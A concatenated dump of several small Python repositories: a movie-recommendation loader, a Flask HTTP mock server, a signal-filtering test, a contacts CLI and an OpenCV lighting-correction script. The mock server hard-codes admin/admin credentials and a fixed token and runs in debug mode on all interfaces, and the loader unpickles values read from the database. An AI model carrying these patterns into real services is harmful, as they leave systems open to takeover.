np.loadtxt('./data/X.csv', delimiter=',')\n d = np.loadtxt('./data/d.csv', delimiter=',')\n b = np.loadtxt('./data/b.csv', delimiter=',')\n\n wf = {\"name\": \"W\", \"value\": bson.Binary(pickle.dumps(W, protocol=2))}\n xf = {\"name\": \"X\", \"value\": bson.Binary(pickle.dumps(X, protocol=2))}\n df = {\"name\": \"d\", \"value\": d.tolist()}\n bf = {\"name\": \"b\", \"value\": b.tolist()}\n\n db[\"model\"].insert_one(wf)\n db[\"model\"].insert_one(xf)\n db[\"model\"].insert_one(df)\n db[\"model\"].insert_one(bf)\nelse:\n for model in db[\"model\"].find():\n if model['name'] == \"W\":\n W = np.asarray(pickle.loads(model['value']))\n elif model['name'] == \"X\":\n X = np.asarray(pickle.loads(model['value']))\n elif model['name'] == \"d\":\n d = np.asarray(model['value'])\n elif model['name'] == \"b\":\n b = np.asarray(model['value'])\n\n# load all ratings as utility matrix for mfcf model\nratings_cursor = db['rating'].find()\nratings_dataframe = pd.DataFrame(list(ratings_cursor), columns=[\n 'userId', 'movieId', 'rating', 'timestamp']).astype({'userId': int, 'movieId': int, 'rating': int, })\nratings_matrix = np.asmatrix(ratings_dataframe)\nrate_train, rate_test = train_test_split(\n ratings_matrix, test_size=0.2, random_state=10)\n\n# mfcf machine learning model\nmfcf_model = MatrixFactorization(\n Y=ratings_matrix, K=50, lam=.01, Xinit=X, Winit=W, bInit=b, dInit=d, learning_rate=50, max_iter=30)\n", "repo_name": "iamtienng/movie-recommendation-system", "sub_path": "mrsbb/BackEnd/mrsbb-be/extensions.py", "file_name": "extensions.py", "file_ext": "py", "file_size_in_byte": 2489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymongo.MongoClient", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "bson.Binary", "line_number": 39, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 39, "usage_type": "call"}, {"api_name": "bson.Binary", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 51, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 53, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.asmatrix", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 64, "usage_type": "call"}, {"api_name": "recommendation_system.matrix_factorization.MatrixFactorization", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "20852606899", "text": "from flask import Flask, request\nimport flask\nfrom flask.globals import session\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\nfrom werkzeug.datastructures import Accept\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom datetime import datetime, date\nimport xmltodict\nimport random\nimport base64\nimport json\nimport ipaddress\n\napp = Flask(__name__)\nauth = HTTPBasicAuth()\nbearer = HTTPTokenAuth(scheme='Bearer')\n\njson_data = {\n \"response\": {\n \"status\": \"success\",\n \"name\": \"http mock server\",\n \"date\": date.today(),\n \"time\": datetime.now().strftime(\"%H:%M:%S\"),\n \"details\": {\n \"id\": \"12345\",\n \"name\": \"dummy data\",\n \"description\": \"ubot testing for generic http servers\"\n },\n \"data\": []\n }\n}\n\nid = 3896\n\nxml_data = xmltodict.unparse(json_data, pretty=True)\n\nusers = {\n 'admin': generate_password_hash('admin')\n}\n\ntokens = dict()\nsessions = dict()\nallocated = dict()\n\n@auth.verify_password\ndef verify_password(username, password):\n if username in users and check_password_hash(users.get(username), password):\n return username\n\n@bearer.verify_token\ndef verify_token(token):\n if token in tokens:\n return tokens[token]\n\n@app.route('/', methods=['GET'])\ndef get_endpoints():\n ep_dict = {\n 'endpoints': {\n 'GET': '/api/v1/get_data',\n 'POST': '/api/v1/post_data',\n 'PUT': '/api/v1/modify_data',\n 'PATCH': '/api/v1/modify_data',\n 'DELETE': '/api/v1/remove_data',\n 'HEAD': '/api/v1/head',\n 'RESET': '/api/v1/reset_data',\n 'TEST TOKEN': '/token-auth',\n 'GET TOKEN (header)': '/api/v1/get-token',\n 'GET TOKEN': '/api/v2/get_token',\n 'GET SESSION': '/api/v2/get_session',\n 'ALLOCATE': '/api/v2/allocate',\n 'DEALLOVATE': '/api/v2/deallocate'\n }\n }\n if request.headers.get('accept') == 'application/xml':\n return xmltodict.unparse(ep_dict, pretty=True), 200\n else:\n return ep_dict, 200\n\n\ndef print_globals(task):\n print(\"-------------------\", task, \"--------------------\")\n print(\"tokens: \", tokens)\n print(\"sessions: \", sessions)\n print(\"allocated: \", allocated)\n print(\"-------------------------------------------------\")\n\n@app.route('/api/v2/get_token', methods=['POST'])\ndef get_access_token():\n global tokens\n data = json.loads(request.get_data().decode())\n username = data.get('user')\n num = random.randint(10000, 99999)\n tm = datetime.now()\n token_string = f'{tm}{username}{num}'\n token = base64.b64encode(token_string.encode()).decode()\n tokens[token] = username\n return f'\"token\": \"{token}\"', 200\n\n\n@app.route('/api/v2/get_session', methods=['POST'])\ndef get_session():\n global sessions\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n if token not in tokens:\n return \"Invalid token\", 400\n session_id = random.randint(20124, 99999)\n sessions[session_id] = token\n return f'\"session-id\": \"{session_id}\"', 200\n\n\n@app.route('/api/v2/allocate', methods=['POST'])\ndef allocate():\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n session = data.get('session')\n if int(session) not in sessions:\n return \"Invalid session id\", 400\n if sessions.get(int(session)) != token:\n return \"Invalid token\", 400\n subnet = data.get('subnet')\n network = ipaddress.ip_network(subnet)\n for add in network.hosts():\n if add not in allocated.values():\n allocated[int(session)] = add\n return f'\"ip-address\": \"{add}\"', 200\n return 'no address available', 400\n\n\n@app.route('/api/v2/deallocate', methods=['POST'])\ndef deallocate():\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n session = data.get('session')\n if int(session) not in sessions:\n return \"Invalid session id\", 400\n if sessions.get(int(session)) != token:\n return \"Invalid token\", 400\n if int(session) in allocated:\n del allocated[int(session)]\n return \"Deallocated\", 200\n\n\n@app.route('/api/v1/get_data', methods=['GET'])\ndef get_data():\n try:\n accept = request.headers.get('accept')\n if accept == 'application/xml':\n xml_data = xmltodict.unparse(json_data, pretty=True)\n return xml_data, 200\n else:\n return json_data, 200\n except Exception as e:\n return f\"{e}\", 500\n\n@app.route('/api/v1/get_data/', methods=['GET'])\ndef get_data_by_id(id):\n try:\n print(id)\n final_data = {\n \"msg\": \"no data found\"\n }\n data = json_data.get('response').get('data')\n for d in data:\n print(d.get('id'))\n if d.get('id') and str(d.get('id')) == id:\n final_data = d\n accept = request.headers.get('accept')\n if accept == 'application/xml':\n return xmltodict.unparse(final_data, pretty=True), 200\n else:\n return final_data, 200\n except Exception as e:\n return f\"{e}\", 500\n\n\ndef update(success_code):\n global id\n try:\n data = None\n content_type = request.headers.get('Content-Type')\n print(content_type)\n if content_type == 'application/json':\n data = request.get_json()\n data['id'] = id\n id = id+1\n input_type = 'json'\n elif content_type == 'application/xml':\n data = request.get_data().decode()\n try:\n data_dict = xmltodict.parse(data)\n data = xmltodict.unparse(data_dict, pretty=True)\n input_type = 'xml'\n except Exception as e:\n return {\n 'status': 'failure',\n 'msg': f'invalid xml: {e}'\n }, 400\n elif content_type == 'application/x-www-form-urlencoded':\n print('step-1')\n data = request.form\n print(data)\n input_type = 'form data'\n elif 'multipart/form-data' in content_type:\n data = request.form\n files = request.files\n print(files)\n input_type = 'mulitpart form data'\n else:\n data = request.get_data().decode()\n input_type = 'raw data'\n if data is not None and data != \"\":\n try:\n json_data['response']['data'].append(data)\n except Exception as e:\n pass\n finally:\n return {\n 'status': 'success',\n 'msg': 'valid input',\n 'input-type': input_type,\n 'input': data\n }, success_code\n else:\n return {\n 'status': 'success',\n 'msg': 'input is None'\n }, success_code\n except Exception as e:\n print(e)\n return {\n 'status': 'failure',\n 'msg': f'{e}'\n }, 500\n\n@app.route('/api/v1/create_data', methods=['POST'])\ndef post_data():\n return update(201)\n\n\n@app.route('/api/v1/modify_data/', methods=['PUT', 'PATCH'])\ndef put_data(id):\n return update(202)\n\n@app.route('/api/v1/reset_data', methods=['POST'])\ndef reset():\n json_data['response']['data'] = []\n return \"\", 204\n\n\n@app.route('/api/v1/remove_data', methods=['DELETE'])\ndef delete_data():\n try:\n data = \"\"\n if len(request.args.to_dict().keys()) != 0:\n for key in request.args.keys():\n data = f'{data}{key}={request.args.get(key)} '\n return {\n 'status': 'success',\n 'msg': f'Data deleted for {data}'\n }, 202\n elif request.get_data().decode() != \"\":\n data = request.get_data().decode()\n if request.headers['content-type'] == 'application/json':\n data = json.loads(data)\n return {\n 'status': 'success',\n 'msg': f'Data deleted for {data}'\n }, 202\n else:\n return \"\", 204\n except Exception as e:\n return {\n 'status': 'failure',\n 'msg': f'{e}'\n }, 500\n\n@app.route('/api/v1/head', methods=['HEAD'])\ndef head():\n return {\"content\": \"some content\"}, 202\n\n@app.route('/api/v1/get-token', methods=['GET'])\n@auth.login_required\ndef get_token():\n global tokens\n username = auth.username()\n token = 'MjAyMS0wOS0yOCAwNTozNTo1Mi44MDg1NTNhZG1pbjQzNzM0'\n tokens[token] = username\n response = flask.Response()\n print(token)\n response.headers['Access-token'] = token\n return response\n\n@app.route('/token-auth', methods=['GET'])\n@bearer.login_required\ndef test_token_auth():\n return f\"welcome {bearer.current_user()}\", 200\n\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)", "repo_name": "shiv6/mock-server", "sub_path": "mock_server.py", "file_name": "mock_server.py", "file_ext": "py", "file_size_in_byte": 8970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_httpauth.HTTPBasicAuth", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_httpauth.HTTPTokenAuth", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 35, "usage_type": "call"}, {"api_name": "werkzeug.security.generate_password_hash", "line_number": 38, "usage_type": "call"}, {"api_name": "werkzeug.security.check_password_hash", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 75, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 93, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 95, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 107, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 117, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 119, "usage_type": "argument"}, {"api_name": "ipaddress.ip_network", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.globals.session", "line_number": 125, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 135, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 137, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 139, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 140, "usage_type": "argument"}, {"api_name": "flask.request.headers.get", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 147, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 147, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 170, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 181, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 184, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 184, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}, {"api_name": "xmltodict.parse", "line_number": 191, "usage_type": "call"}, {"api_name": "xmltodict.unparse", "line_number": 192, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 201, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 205, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 206, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 206, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 210, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 210, "usage_type": "name"}, {"api_name": "flask.request.args.to_dict", "line_number": 255, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 255, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.request.args.keys", "line_number": 256, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 257, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 257, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 262, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 263, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 264, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 264, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 265, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 289, "usage_type": "call"}]}
+{"seq_id": "4559228483", "text": "#!/usr/bin/env python3\n\"\"\"Tests signal filtering.\"\"\"\n# Python imports\nimport sys\nimport random\n\n# Dependency imports\nimport numpy as np\nimport pyqtgraph as pg\n\n# Package imports\nfrom .. import signal\n\ndef square_wave(length, gaussian_noisiness=2, salt_pepper_noisiness=2, amplitude=100):\n \"\"\"Returns a noisy square wave signal.\n High values have gaussian noise, while low values have salt-and-pepper noise.\n \"\"\"\n i = 0\n while i < length:\n for _ in range(0, 50):\n yield (i, 0 + random.gauss(0, gaussian_noisiness))\n i = i + 1\n for _ in range(0, 50):\n yield (i, amplitude * (random.randint(0, amplitude - 1) > salt_pepper_noisiness))\n i = i + 1\ndef sine_wave(length, gaussian_noisiness=2, amplitude=50):\n \"\"\"Returns a noisy sine wave signal with gaussian noise.\"\"\"\n i = 0\n sample_points = np.linspace(0.0, 2 * np.pi, num=length)\n wave = amplitude * (1 + np.sin(2 * np.pi * sample_points))\n for i in range(0, length):\n yield (i, wave[i] + random.gauss(0, gaussian_noisiness))\n\ndef stream(signal_generator):\n \"\"\"Continuously generates noisy data and filters it, then plots the results.\"\"\"\n signal_length = 500\n filterer = signal.moving_filter(10)\n\n # Plotting\n signal_x = []\n signal_y = []\n filtered_x = []\n filtered_y = []\n\n for (sample_number, sample) in signal_generator(signal_length):\n signal_x.append(sample_number)\n signal_y.append(sample)\n filtered = filterer.send((sample_number, sample))\n if filtered is not None:\n filtered_x.append(filtered[0])\n filtered_y.append(filtered[1])\n\n graph = pg.plot()\n graph.addLegend()\n graph.plot(signal_x, signal_y, pen='r', name=\"Raw (Noisy) Signal\")\n graph.plot(filtered_x, filtered_y, pen='b', name=\"Filtered Signal\")\n\nif __name__ == \"__main__\":\n pg.setConfigOptions(antialias=True, background='w', foreground='k')\n stream(square_wave)\n stream(sine_wave)\n sys.exit(pg.Qt.QtGui.QApplication.instance().exec_())\n", "repo_name": "ethanjli/vera-sleeve", "sub_path": "verasleeve/tests/signal_filtering.py", "file_name": "signal_filtering.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.gauss", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 30, "usage_type": "attribute"}, {"api_name": "random.gauss", "line_number": 32, "usage_type": "call"}, {"api_name": "pyqtgraph.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "pyqtgraph.setConfigOptions", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 62, "usage_type": "call"}, {"api_name": "pyqtgraph.Qt.QtGui.QApplication.instance", "line_number": 62, "usage_type": "call"}, {"api_name": "pyqtgraph.Qt", "line_number": 62, "usage_type": "attribute"}]}
+{"seq_id": "12326641246", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom datetime import date, datetime\n\nif __name__ == '__main__':\n # Список работников.\n people = []\n\n # Организовать бесконечный цикл запроса команд.\n while True:\n # Запрос команды\n command = input(\">>> \").lower()\n\n # Выполнить действие в соответствие с командой.\n if command == 'exit':\n break\n\n elif command == 'add':\n # Запросить данные о работнике.\n name = input(\"Фамилия и инициалы? \")\n post = input(\"Телефон? \")\n #year = input(\"Дата рождения? \")\n\n #year = date(int(year[2]), int(year[1]), int(year[0]))\n year = input(\"Введите дату рождения (гггг.мм.дд): \")\n year = year.split(\".\")\n year = date(int(year[0]), int(year[1]), int(year[2]))\n\n\n # Создать словарь.\n man = {\n 'name': name,\n 'tel': post,\n 'date': year,\n }\n\n # Добавить словарь в список.\n people.append(man)\n # Отсортировать список в случае необходимости.\n if len(people) > 1:\n people.sort(key=lambda item: item.get('tel', ''))\n\n elif command == 'list':\n # Заголовок таблицы.\n line = '+-{}-+-{}-+-{}-+-{}-+'.format(\n '-' * 4,\n '-' * 30,\n '-' * 20,\n '-' * 20\n )\n print(line)\n print(\n '| {:^4} | {:^30} | {:^20} | {:^20} |'.format(\n \"№\",\n \"Ф.И.О.\",\n \"Телефон\",\n \"Год рождения\"\n )\n )\n print(line)\n\n # Вывести данные о всех сотрудниках.\n for idx, man in enumerate(people, 1):\n print(\n '| {:>4} | {:<30} | {:<20} | {:>20} |'.format(\n idx,\n man.get('name', ''),\n man.get('tel', ''),\n str(man.get('date', ''))\n )\n )\n print(line)\n\n elif command.startswith('select'):\n\n # Разбить команду на части.\n parts = command.split(' ', maxsplit=1)\n # Получить имя.\n period = parts[1]\n count = 0\n # Проверить сведения работников из списка.\n for man in people:\n if man.get('name', period).lower() == period.lower():\n count += 1\n line = '+-{}-+-{}-+-{}-+-{}-+'.format(\n '-' * 4,\n '-' * 30,\n '-' * 20,\n '-' * 12\n )\n print(line)\n print(\n '| {:^4} | {:^30} | {:^20} | {:^12} |'.format(\n \"№\",\n \"Ф.И.О.\",\n \"Телефон\",\n \"Год рождения\"\n )\n )\n print(line)\n print(\n '| {:>4} | {:<30} | {:<20} | {:>12} |'.format(\n count,\n man.get('name', ''),\n man.get('tel', ''),\n str(man.get('date', 0))\n )\n )\n print(line)\n\n\n # Если счетчик равен 0, то работники не найдены.\n if count == 0:\n print(\"Люди с заданным именем не найдены.\")\n\n elif command == 'help':\n # Вывести справку о работе с программой.\n print(\"Список команд:\\n\")\n print(\"add - добавить человека;\")\n print(\"list - вывести список людей;\")\n print(\"select <имя> - запросить людей с этим именем;\")\n print(\"help - отобразить справку;\")\n print(\"exit - завершить работу с программой.\")\n\n else:\n print(f\"Неизвестная команда {command}\", file=sys.stderr)\n", "repo_name": "AndrejMirrox/labor-9", "sub_path": "PyCharm/Individual.py", "file_name": "Individual.py", "file_ext": "py", "file_size_in_byte": 4802, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 128, "usage_type": "attribute"}]}
+{"seq_id": "2089442678", "text": "\"\"\"\r\n\r\n조명에 의해 생긴 Gradation을 제거하기 위해...\r\n\r\nclass removeLightGradation():\r\n 1. Check Image Size \r\n 2. LAB모델을 이용한 Color Space (RGB -> LAB변환)\r\n 3. Median Filter(Radius : 20 ~ 50, 100 : 실제와 가장 근사한 조명상태 구현)\r\n 4. 3번 이미지 반전하여 역조명 채널 생성\r\n 5. 원본영상에 합성\r\n 6. Histogram 최대-최소평균으로 Golbal Thresholding\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom cv2 import cv2\r\nimport math\r\n\r\n\r\nclass removeLightGradation:\r\n\r\n def __init__(self, img):\r\n self.img = img\r\n \r\n\r\n def convertLAB(self):\r\n return cv2.cvtColor(self.img, cv2.COLOR_BGR2LAB)\r\n\r\n\r\n def addMedianFilter(self, labImg, val = 55):\r\n filterImg = cv2.medianBlur(labImg, val)\r\n return filterImg\r\n \r\n\r\n def createReverseImg(self, filterImg):\r\n return cv2.bitwise_not(filterImg)\r\n\r\n\r\n def mergeImg(self, img1, img2):\r\n return cv2.add(img1, img2)\r\n \r\n def imgBlending(self, img1, img2, val):\r\n return cv2.addWeighted(img1, val, img2, 1-val, 0)\r\n\r\n\r\n def globalThresholding(self, img):\r\n #Histogram 의 최대-최소 평균으로 Global Thresholding\r\n ret, thr = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n return thr\r\n\r\n def thresholding(self, img, threshold = 127, value = 255):\r\n #ret, thr9 = cv2.threshold(img, threshold, value, cv2.THRESH_BINARY)\r\n thr10 = cv2.adaptiveThreshold(img, value, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2)\r\n thr11 = cv2.adaptiveThreshold(img, value, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\r\n\r\n titles = ['adaptive mean', 'adaptive gaussian']\r\n images = [thr10, thr11]\r\n showPlot(titles, images)\r\n\r\n\r\ndef showImg(title, img):\r\n cv2.imshow(title, img)\r\n\r\n cv2.waitKey(0)\r\n #k=cv2.waitKey(0) & 0xFF\r\n # if k == ord('s'):\r\n cv2.destroyAllWindows()\r\n\r\n\r\ndef showPlot(titles, images):\r\n \r\n num = len(titles)\r\n \r\n if num % 2 :\r\n row = int(num/2) + 1\r\n else:\r\n row = int(num/2)\r\n \r\n #print(\"num = {1}, row = {0}\".format(row, num))\r\n \r\n cnt = 0\r\n for i in range(0,row):\r\n cnt+=1\r\n plt.subplot(row, 2, cnt), plt.imshow(images[cnt-1], cmap = 'gray')\r\n plt.title(titles[cnt-1]), plt.xticks([]), plt.yticks([])\r\n #print(\"cnt = {0}, row = {1}, [cnt-1] = {2}\".format(cnt, row, cnt-1))\r\n\r\n cnt+=1\r\n \r\n try:\r\n if titles[i+2]:\r\n plt.subplot(row, 2, cnt), plt.imshow(images[cnt-1], cmap = 'gray')\r\n plt.title(titles[cnt-1]), plt.xticks([]), plt.yticks([])\r\n #print(\"cnt = {0}, row = {1}, [cnt-1] = {2}\".format(cnt, row, cnt-1)) \r\n except:\r\n pass \r\n \r\n plt.show()\r\n\r\n\r\ndef viewResult2(viewData, row, camp = ''):\r\n#viewData = {'Original': img, 'Gray Img' : img_gray, 'Alpha Img' : img_alp}\r\n\r\n dataLen = len(viewData)\r\n cols = math.ceil(dataLen/row)\r\n #print(\"cols = \", cols)\r\n\r\n i = 1\r\n for key, val in viewData.items():\r\n subplotNo = str(cols)+str(row)+str(i)\r\n #print('key = ', key)\r\n #print('subplotNo = ', subplotNo)\r\n #cv2.imshow(key, val)\r\n\r\n\r\n if(camp == 'gray') : \r\n plt.subplot(subplotNo), plt.imshow(val, cmap = 'gray')\r\n plt.title(key), plt.xticks([]), plt.yticks([])\r\n else :\r\n plt.subplot(subplotNo), plt.imshow(val)\r\n plt.title(key), plt.xticks([]), plt.yticks([]) \r\n\r\n i = i + 1\r\n # End of for key, val int viewData.items():\r\n plt.show()\r\n\r\n\r\n# End of viewResult2()\r\n# for i in range(1,11):\r\n# if i % 2 :\r\n# row = int(i/2) + 1\r\n# else:\r\n# row = int(i / 2)\r\n# #print(\"int({0} / 2) = {1}, int(round( {0} / 2)) = {2}\".format(i, int(i/2), int(round(i/2))))\r\n# print(\"i = {0}, row = {1}\".format(i, row))\r\n\r\n\r\n# Open Image - Color Image로 Open 해야 함.... \r\nimg = cv2.imread('gradation03.jpg', cv2.IMREAD_COLOR)\r\nshowImg(\"원본\", img)\r\n\r\nrt = removeLightGradation(img)\r\n\r\n# Change Color Space to LAB \r\nlabImg = rt.convertLAB()\r\n#showImg('LAB', labImg)\r\n\r\n# split Channel\r\nl, a, b = cv2.split(labImg)\r\n#showImg('labImg - l', l)\r\n#showImg('labImg - a', a)\r\n#showImg('labImg - b', b)\r\n\r\n\r\n# add Median Filter\r\nfilterImg = rt.addMedianFilter(l, 55)\r\n#showImg('Median 99', filterImg)\r\nlabFilterImg = rt.addMedianFilter(labImg, 55)\r\n\r\n# make sub Img(white - img)\r\nc, r = l.shape\r\noutImg = np.ones((c,r), np.uint8)*255\r\n#showImg('outImg', outImg)\r\n#print(l.shape)\r\n#print(outImg)\r\nsubImg = outImg - l\r\n#showImg('subImg', subImg)\r\n\r\nviewData = {'original':img, 'l':l, 'outImg':outImg, 'subImg':subImg}\r\nviewResult2(viewData, 2, 'gray')\r\n\r\nfor i in range(1,6):\r\n subImg = outImg - subImg\r\nshowImg('subImg', subImg)\r\n\r\n# make Reverse Image\r\nreverseImg = rt.createReverseImg(filterImg)\r\n#showImg('reverseImg', reverseImg)\r\nreverseImg1 = rt.createReverseImg(labFilterImg)\r\ngrayReverseImg = cv2.cvtColor(reverseImg1, cv2.COLOR_LAB2BGR)\r\ngrayReverseImg = cv2.cvtColor(grayReverseImg, cv2.COLOR_BGR2GRAY)\r\n\r\n\r\ntitles = ['Filter Img - l', 'Filter Img - LAB', 'Reverse Img - l', 'Reverse Img - LAB', 'Gray Reverse Img - LAB']\r\nimages = [filterImg, labFilterImg, reverseImg, reverseImg1, grayReverseImg]\r\nshowPlot(titles, images)\r\n\r\n\r\n\r\n# Image merge\r\nmergeImg = rt.mergeImg(l, reverseImg)\r\nmergeImg1 = rt.mergeImg(l, grayReverseImg)\r\nBlendingImg = rt.imgBlending(l, reverseImg, 0.5)\r\nBlendingImg1 = rt.imgBlending(l, grayReverseImg, 0.5)\r\n\r\ntitles = [\"Merge Img - l\", \"Merge Img - LAB\", \"Blending Img - l\", \"Blending Img - LAB\", 'Original Img']\r\nimages = [mergeImg, mergeImg1, BlendingImg, BlendingImg1, img]\r\nshowPlot(titles, images)\r\n\r\n# viewData = {\"Merge Img - l\":mergeImg, \"Merge Img - LAB\":mergeImg1, \"Blending Img - l\":BlendingImg, \"Blending Img - LAB\":BlendingImg1, 'Original Img':img}\r\n# viewResult2(viewData, 2)\r\n\r\n\r\nresultImg = rt.globalThresholding(mergeImg)\r\nresultImg1 = rt.globalThresholding(mergeImg1)\r\nresultImg2 = rt.globalThresholding(BlendingImg)\r\nresultImg3 = rt.globalThresholding(BlendingImg1)\r\n\r\n# titles = ['Threshold - Merge_L', 'Threshold 